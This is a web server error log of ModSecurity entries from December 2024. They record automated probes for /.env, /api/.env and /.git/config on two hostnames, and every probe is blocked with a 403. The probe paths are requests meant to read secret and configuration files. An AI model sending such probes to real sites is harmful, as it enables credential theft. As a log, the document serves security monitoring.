[Thu Dec 05 02:36:33.650061 2024] [:error] [pid 3758047] [client 109.205.213.18:54568] [client 109.205.213.18] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/.env"] [unique_id "Z1EDoV0ZPgA8kNujNh6HcgAAAAQ"]
[Thu Dec 05 02:36:34.221800 2024] [:error] [pid 3758116] [client 109.205.213.18:54570] [client 109.205.213.18] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /api/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/api/.env"] [unique_id "Z1EDoiDZj-HIZyTxZMzOeAAAAAU"]
[Thu Dec 05 02:36:34.222529 2024] [:error] [pid 3758116] [client 109.205.213.18:54570] [client 109.205.213.18] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/api/.env"] [unique_id "Z1EDoiDZj-HIZyTxZMzOeAAAAAU"]
[Thu Dec 05 02:36:34.222973 2024] [:error] [pid 3758116] [client 109.205.213.18:54570] [client 109.205.213.18] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/api/.env"] [unique_id "Z1EDoiDZj-HIZyTxZMzOeAAAAAU"]
[Fri Dec 06 10:06:09.575073 2024] [:error] [pid 3783006] [client 45.148.10.172:54690] [client 45.148.10.172] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env"] [unique_id "Z1K-gZ2f1qclFXZjjgykZwAAAAU"]
[Fri Dec 06 10:06:09.577353 2024] [:error] [pid 3783006] [client 45.148.10.172:54690] [client 45.148.10.172] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env"] [unique_id "Z1K-gZ2f1qclFXZjjgykZwAAAAU"]
[Fri Dec 06 10:06:09.577769 2024] [:error] [pid 3783006] [client 45.148.10.172:54690] [client 45.148.10.172] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env"] [unique_id "Z1K-gZ2f1qclFXZjjgykZwAAAAU"]
[Tue Dec 10 11:00:02.608862 2024] [:error] [pid 3875892] [client 18.156.35.7:33330] [client 18.156.35.7] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.git/config"] [unique_id "Z1gRInAUNRFrVubUVCVj9gAAAAk"]
[Tue Dec 10 11:00:02.611195 2024] [:error] [pid 3875892] [client 18.156.35.7:33330] [client 18.156.35.7] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.git/config"] [unique_id "Z1gRInAUNRFrVubUVCVj9gAAAAk"]
[Tue Dec 10 11:00:02.611542 2024] [:error] [pid 3875892] [client 18.156.35.7:33330] [client 18.156.35.7] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.git/config"] [unique_id "Z1gRInAUNRFrVubUVCVj9gAAAAk"]
[Wed Dec 11 01:29:17.652791 2024] [:error] [pid 3886384] [client 103.102.230.8:58012] [client 103.102.230.8] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.git/config"] [unique_id "Z1jc3b1fgkt_eS3-AtoIJgAAAAI"]
[Wed Dec 11 01:29:17.653542 2024] [:error] [pid 3886384] [client 103.102.230.8:58012] [client 103.102.230.8] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.git/config"] [unique_id "Z1jc3b1fgkt_eS3-AtoIJgAAAAI"]
[Wed Dec 11 01:29:17.654033 2024] [:error] [pid 3886384] [client 103.102.230.8:58012] [client 103.102.230.8] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.git/config"] [unique_id "Z1jc3b1fgkt_eS3-AtoIJgAAAAI"]
[Wed Dec 11 04:10:40.636665 2024] [:error] [pid 3890144] [client 103.102.230.8:57312] [client 103.102.230.8] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.git/config"] [unique_id "Z1kCsMKhpIvv0BmtzentswAAAAQ"]
[Wed Dec 11 04:10:40.637344 2024] [:error] [pid 3890144] [client 103.102.230.8:57312] [client 103.102.230.8] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.git/config"] [unique_id "Z1kCsMKhpIvv0BmtzentswAAAAQ"]
[Wed Dec 11 04:10:40.637861 2024] [:error] [pid 3890144] [client 103.102.230.8:57312] [client 103.102.230.8] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.git/config"] [unique_id "Z1kCsMKhpIvv0BmtzentswAAAAQ"]
[Wed Dec 11 06:38:29.708521 2024] [:error] [pid 3890144] [client 103.102.230.8:51416] [client 103.102.230.8] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.git/config"] [unique_id "Z1klVcKhpIvv0BmtzentyAAAAAQ"]
[Wed Dec 11 06:38:29.709008 2024] [:error] [pid 3890144] [client 103.102.230.8:51416] [client 103.102.230.8] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.git/config"] [unique_id "Z1klVcKhpIvv0BmtzentyAAAAAQ"]
[Wed Dec 11 06:38:29.709405 2024] [:error] [pid 3890144] [client 103.102.230.8:51416] [client 103.102.230.8] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.git/config"] [unique_id "Z1klVcKhpIvv0BmtzentyAAAAAQ"]
[Wed Dec 11 06:38:31.013456 2024] [:error] [pid 3890141] [client 103.102.230.8:33544] [client 103.102.230.8] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/.git/config"] [unique_id "Z1klV7QVJnhbSrT4f8MqXwAAAAE"]
[Wed Dec 11 06:38:31.014033 2024] [:error] [pid 3890141] [client 103.102.230.8:33544] [client 103.102.230.8] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/.git/config"] [unique_id "Z1klV7QVJnhbSrT4f8MqXwAAAAE"]
[Wed Dec 11 06:38:31.014543 2024] [:error] [pid 3890141] [client 103.102.230.8:33544] [client 103.102.230.8] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/.git/config"] [unique_id "Z1klV7QVJnhbSrT4f8MqXwAAAAE"]
[Sat Dec 14 12:44:05.319419 2024] [:error] [pid 3976862] [client 159.89.193.61:56942] [client 159.89.193.61] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env"] [unique_id "Z11vhQkTyABuPaM-v6zQtgAAAAM"]
[Sat Dec 14 12:44:05.320661 2024] [:error] [pid 3976862] [client 159.89.193.61:56942] [client 159.89.193.61] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env"] [unique_id "Z11vhQkTyABuPaM-v6zQtgAAAAM"]
[Sat Dec 14 12:44:05.320995 2024] [:error] [pid 3976862] [client 159.89.193.61:56942] [client 159.89.193.61] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env"] [unique_id "Z11vhQkTyABuPaM-v6zQtgAAAAM"]
[Sat Dec 14 17:39:30.698818 2024] [:error] [pid 3976859] [client 3.133.93.105:38738] [client 3.133.93.105] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.git/config"] [unique_id "Z120wh6khmK3LLy3qryLbgAAAAA"]
[Sat Dec 14 17:39:30.699592 2024] [:error] [pid 3976859] [client 3.133.93.105:38738] [client 3.133.93.105] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.git/config"] [unique_id "Z120wh6khmK3LLy3qryLbgAAAAA"]
[Sat Dec 14 17:39:30.700122 2024] [:error] [pid 3976859] [client 3.133.93.105:38738] [client 3.133.93.105] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.git/config"] [unique_id "Z120wh6khmK3LLy3qryLbgAAAAA"]
[Sat Dec 14 17:49:04.424247 2024] [:error] [pid 3976873] [client 45.148.10.172:47346] [client 45.148.10.172] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env"] [unique_id "Z123AInXkTXN5x2-d-1cxAAAAAU"]
[Sat Dec 14 17:49:04.424905 2024] [:error] [pid 3976873] [client 45.148.10.172:47346] [client 45.148.10.172] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env"] [unique_id "Z123AInXkTXN5x2-d-1cxAAAAAU"]
[Sat Dec 14 17:49:04.425328 2024] [:error] [pid 3976873] [client 45.148.10.172:47346] [client 45.148.10.172] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env"] [unique_id "Z123AInXkTXN5x2-d-1cxAAAAAU"]
[Sat Dec 14 22:34:08.672524 2024] [:error] [pid 3976861] [client 45.148.10.86:41340] [client 45.148.10.86] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.git/config"] [unique_id "Z1350NXot-oY2JdMz3OXswAAAAI"]
[Sat Dec 14 22:34:08.673251 2024] [:error] [pid 3976861] [client 45.148.10.86:41340] [client 45.148.10.86] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.git/config"] [unique_id "Z1350NXot-oY2JdMz3OXswAAAAI"]
[Sat Dec 14 22:34:08.673743 2024] [:error] [pid 3976861] [client 45.148.10.86:41340] [client 45.148.10.86] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.git/config"] [unique_id "Z1350NXot-oY2JdMz3OXswAAAAI"]
[Sun Dec 15 08:47:07.512373 2024] [:error] [pid 3996927] [client 3.133.93.105:52978] [client 3.133.93.105] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/.git/config"] [unique_id "Z16Je5n0vijqaJHcoopwTwAAAAM"]
[Sun Dec 15 08:47:07.512995 2024] [:error] [pid 3996927] [client 3.133.93.105:52978] [client 3.133.93.105] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/.git/config"] [unique_id "Z16Je5n0vijqaJHcoopwTwAAAAM"]
[Sun Dec 15 08:47:07.513551 2024] [:error] [pid 3996927] [client 3.133.93.105:52978] [client 3.133.93.105] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/.git/config"] [unique_id "Z16Je5n0vijqaJHcoopwTwAAAAM"]
[Sun Dec 15 08:47:08.262537 2024] [:error] [pid 3996924] [client 3.133.93.105:52984] [client 3.133.93.105] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.git/config"] [unique_id "Z16JfB_OuEE7msQR9G3mygAAAAA"]
[Sun Dec 15 08:47:08.262847 2024] [:error] [pid 3996924] [client 3.133.93.105:52984] [client 3.133.93.105] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.git/config"] [unique_id "Z16JfB_OuEE7msQR9G3mygAAAAA"]
[Sun Dec 15 08:47:08.263070 2024] [:error] [pid 3996924] [client 3.133.93.105:52984] [client 3.133.93.105] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.git/config"] [unique_id "Z16JfB_OuEE7msQR9G3mygAAAAA"]
